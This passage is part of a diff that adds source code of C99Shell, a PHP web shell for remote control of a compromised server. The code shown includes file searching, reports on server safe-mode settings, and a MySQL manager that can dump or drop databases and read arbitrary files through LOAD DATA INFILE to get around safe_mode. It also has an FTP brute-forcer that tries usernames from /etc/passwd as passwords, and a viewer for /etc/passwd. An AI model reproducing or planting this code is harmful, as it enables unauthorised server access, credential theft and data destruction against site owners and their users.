&& $f != "..") + { + if (is_dir($d.$f)) + { + if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;} + c99fsearch($d.$f); + } + else + { + if ($true) + { + if (!empty($a[text])) + { + $r = @file_get_contents($d.$f); + if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";} + if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} + + if ($a[text_regexp]) {$true = ereg($a[text],$r);} + else {$true = strinstr($a[text],$r);} + if ($a[text_not]) + { + if ($true) {$true = false;} + else {$true = true;} + } + if ($true) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($handle); +} +} +//Sending headers +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); + +global $SERVER_SOFTWARE; +if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} +else {$win = 0;} + +if (empty($tmpdir)) +{ + if (!$win) {$tmpdir = "/tmp/";} + else {$tmpdir = $_ENV[SystemRoot];} +} +$tmpdir = str_replace("\\","/",$tmpdir); +if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "<font color=\"red\">ON (secure)</font>"; +} +else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") +{ + $openbasedir = true; + $hopenbasedir = "<font color=\"red\">".$v."</font>"; +} +else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";} + +$sort = htmlspecialchars($sort); + +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE); + 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string","#DD0000"); //#DD0000 + +if ($act != "img") +{ +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; 
font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0> +<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. 
<?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo php_uname(); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\","/",$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\","/",$d); +if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} +$dispd = htmlspecialchars($d); +$pd = $e = explode("/",substr($d,0,strlen($d)-1)); +$i = 0; +echo "<b>Directory: </b>"; +foreach($pd as $b) +{ + $t = ""; + reset($e); + $j = 0; + foreach ($e as $r) + { + $t.= $r."/"; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = true; + $wdt = "<font color=\"green\">[ ok ]</font>"; + echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = false; + $wdt = "<font color=\"red\">[ Read-Only ]</font>"; + echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>"; +} +$free = diskfreespace($d); +if (!$free) {$free = 0;} +$all = disk_total_space($d); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = round(100/($all/$free),2); +echo "<br><b>Free ".view_size($free)." of ".view_size($all)." 
(".$used_percent."%)</b><br>"; +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); + echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +$letters = ""; +if ($win) +{ + $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z"); + $v = explode("/",$d); + $v = $v[0]; + foreach ($abc as $letter) + { + if (is_dir($letter.":/")) + { + if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";} + else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";} + } + } + if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;} +} +?></p></td></tr></table><br><?php +if ((!empty($donated_html)) and (in_array($act,$donated_act))) +{ + ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php +} +?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 
cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_error(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();} + } + else {$sql_sock = false;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");} + else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");} + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + + echo "<center><b>MySQL 
".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_error();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = 
mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b> +"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_error();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + echo "<option value=\"\">Databases (...)</option> +"; + $c = 0; + while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option> +"; $c++;} + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + if ($sql_db) + { + echo "<center><b>There are ".$c." 
tables in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}} + echo "</b></center>"; + + $acts = array("","dump"); + + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if ($submit) + { + if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + } + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; 
?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtpl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();} + } + elseif ($sql_act == "dump") + { + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "print"; + if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;} + elseif ($dump_out == "download") + { + @ob_clean(); + header("Content-type: c99shell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + $set["print"] = 1; + $set["nl2br"] = 1; + } + $set["file"] = $dump_file; + $set["add_drop"] = true; + $ret = mysql_dump($set); + if ($dump_out == "download") {exit;} + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 
border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>"; + echo "<td><center><b>Table</b></center></td>"; + echo "<td><b>Rows</b></td>"; + echo "<td><b>Type</b></td>"; + echo "<td><b>Created</b></td>"; + echo "<td><b>Modified</b></td>"; + echo "<td><b>Size</b></td>"; + echo "<td><b>Action</b></td>"; + echo "</tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) + { + $tsize += $row["5"]; + $trows += $row["5"]; + $size = view_size($row["5"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>"; + echo "<td>".$row[3]."</td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td>".$size."</td>"; + echo "<td> +&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a> +&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a> +<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp; +</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>»</b></center></td>"; + echo "<td><center><b>".$i." 
table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\"> +<option>With selected:</option> +<option value=\"drop\" >Drop</option> +<option value=\"empty\" >Empty</option> +<option value=\"chk\">Check table</option> +<option value=\"Optimize table\">Optimize table</option> +<option value=\"Repair table\">Repair table</option> +<option value=\"Analyze table\">Analyze table</option> +</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>"; + mysql_free_result($result); + } + } + } + else + { + $acts = array("","newdb","serverstat","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" 
name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. 
he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + elseif (($sql_act == "getfile")) + { + if (!mysql_create_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();} + else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));} + } + mysql_free_result($result); + if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");} + } + } + } + } + } + echo "</tr></table></table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object 
alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}} + echo "<br><br>"; + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if ($win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) + { + if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;} + else {$true = true;} + } + else {$true = true;} + if ($true) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return true; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + $success++; + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. 
connections!";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>"; + } + } + else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";} + } +} +if ($act == "lsa") +{ + echo "<center><b>Server security information:</b></center>"; + echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>"; + echo "<b>Safe-Mode: ".$hsafemode."</b><br>"; + echo "<b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + $num = $nixpasswd + $nixpwdperpage; + echo "<b>*nix /etc/passwd:</b><br>"; + $i = $nixpasswd; + while ($i < $num) + { + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."<br>";} + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if 